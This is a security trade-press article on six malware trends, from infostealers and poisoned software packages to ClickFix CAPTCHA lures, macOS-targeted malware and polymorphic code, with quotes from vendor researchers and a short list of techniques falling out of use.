6 rising malware trends every security pro should know

Malware is evolving rapidly, driven by advances in AI and changes in computing infrastructures.

Security professionals must continuously educate themselves on these trends to defend against increasingly sophisticated threats.

The traditional game of cat and mouse between security attackers and defenders has got fiercer with fresh techniques evolving and older less effective approaches falling out of fashion.

Here is a look at what’s heating up in the world of malware — and what’s cooling off.

Infostealers commoditizing initial access

Infostealers have experienced huge growth of late, with a 58% increase in infection attempts year-over-year, according to cybersecurity vendor Immersive.

Malware such as Lumma Stealer, StealC, and RisePro are now responsible for 75% of all stolen credentials.

Infostealers steal browser cookies, VPN credentials, MFA (multi-factor authentication) tokens, crypto wallet data, and more. Cybercriminals sell the data that infostealers grab through dark web markets, giving attackers easy access to corporate systems.

“This shift commoditizes initial access, enabling nation-state goals through simple transactions rather than complex attacks,” says Ben McCarthy, lead cyber security engineer at Immersive.

Malicious packages targeting developer environments

Threat actors are systematically compromising the software supply chain by embedding malicious code within legitimate development tools, libraries, and frameworks that organizations use to build applications.

“These supply chain attacks exploit the trust between developers and package repositories,” Immersive’s McCarthy tells CSO. “Malicious packages often mimic legitimate ones while running harmful code, evading standard code reviews.”

In 2024, researchers found 512,847 malicious packages — a 156% year-over-year increase — across software development ecosystems such as NPM, PyPI, and AI platforms like HuggingFace.

Ransomware becoming more targeted and sophisticated

The ransomware landscape has shifted dramatically since law enforcement cracked down on major groups like LockBit.

Modern ransomware threat actors such as RansomHub and Akira now favor smaller, highly targeted attacks, using ransomware as a final step after full infiltration and data exfiltration. This marks a move from broad, opportunistic strikes to focused, high-value campaigns.

“These targeted approaches show threat actors’ growing insight into specific vulnerabilities and their readiness to invest heavily in reconnaissance and tailored attack development,” Immersive’s McCarthy comments.

These groups use advanced evasion techniques such as living-off-the-land (LOTL) tactics and legitimate admin tools to stay hidden. They’re also shifting from file encryption to data theft and extortion, threatening public leaks to pressure victims.

“There’s been a notable uptick in the use of cloud-based services and remote management platforms as part of ransomware toolchains,” says Jamie Moles, senior technical marketing manager at network detection and response provider ExtraHop. “This aligns with a broader trend: Rather than relying solely on traditional malware payloads, adversaries are increasingly shifting toward abusing trusted platforms and ‘living-off-the-land’ techniques.”

Healthcare remains a top target of ransomware attacks, while critical infrastructure faces increasing threats as attackers exploit the urgency that prompts quick ransom payments.

Malware adopting social engineering techniques

Cybercriminals are increasingly adopting ClickFix as a malware delivery method in attacks that rely on social engineering techniques to successfully infect end-user devices.

ClickFix tricks users into executing malicious code — usually a PowerShell script — on their own systems.

ClickFix is a rising threat that takes advantage of growing user fatigue in having to jump through online hoops to ‘prove you’re human.’

By hijacking trust in familiar CAPTCHA processes, threat actors are getting users to actively participate in their own compromise — copying and pasting malicious commands into their systems under the guise of simple verification.

“Over the past year, we’ve seen this technique gain serious traction across phishing sites, compromised webpages, and social engineering campaigns,” says Jim Walter, senior threat researcher at SentinelLABS. “It’s simple, effective, and increasingly common.”

CISOs need to be wary of the threat because it bypasses many traditional detection methods by relying on human behavior rather than system vulnerabilities.

“Raising awareness, hardening endpoint execution policies, and deploying behavioral detection tools are essential to countering this wave of malware delivery,” Walter advises.

Malware targeting macOS enterprise users

Some security vendors report a sharp increase in malware campaigns targeting macOS users in the enterprise.

Phil Stokes, macOS malware researcher at SentinelLABS/SentinelOne, tells CSO: “We’re seeing everything from infostealers disguised as business tools to highly sophisticated modular backdoors — so threat actors have clearly stepped up their game when it comes to targeting Apple users in corporate environments.”

For example, the Atomic Infostealer spreads through fake versions of well-known enterprise apps, not just the usual cracked games or consumer tools that have long been a security headache.

While ransomware and infostealers remain at the forefront of active threats, there’s been a decline in the use of older commodity malware and hacking techniques.

Polymorphic malware evading detection mechanisms

Polymorphicmalware automatically modifies its code each time it replicates or infects a new system, making it difficult for signature-based detection methods to identify it.

This type of malware is challenging for antivirus software to detect and for security researchers to analyze.

Alex Hinchliffe, principal threat researcher at Unit 42, the threat intelligence and incident response arm at Palo Alto Networks, says, “Very basic or specific detection mechanisms, such as hash-based scanners, are thwarted by polymorphism but it’s worth noting that each time a malicious program is compiled — e.g., into an executable — it will yield a new unique fingerprint or hash. Add to this the plethora of free and commercially available compressor, packer, and protector tools, which can be applied to a compiled program, and the ‘same’ program will yield yet more variations and permutations of the same fingerprint.”

Polymorphic malware also often uses encryption to hide its payload, further complicating detection and analysis.

Depreciated malware techniques

Some noticeable trends reflect a “downturn” regarding both types malware and hacking techniques that have fallen out of fashion, mainly because their effectiveness has decreased due to advances in security defenses and practices.

For example, threat actors rely more on legitimate admin tools (such as Sysinternals Suite and living-off-the-land binaries, or LOLBins) for defense evasion and persistence, and less on malicious executables.

“On the hacking tool front, we observed a decrease in the use of more comprehensive tool suites like Cobalt Strike and Sliver,” says Lindsey Welch, technical writer at managed detection and response vendor Huntress. “However, threat actors continue to use specialized tools like Mimikatz and CrackMapExec for functionalities like password sniffing, memory dumping, privilege escalation, and lateral movement.”

Other once popular techniques that have fallen out a favour include:

• Network worms, such as Conficker, because modern networks now feature segmentation, automated patching, and strong endpoint defenses, all of which limit worm propagation
• Traditional botnets
• Exploit kits, which were once a prevalent method for delivering malware through web-based attacks by scanning users systems for known vulnerabilities in software like Adobe Flash, Java, or Internet Explorer, and then exploiting those weaknesses to install malware
• Office macros
• USB-based malware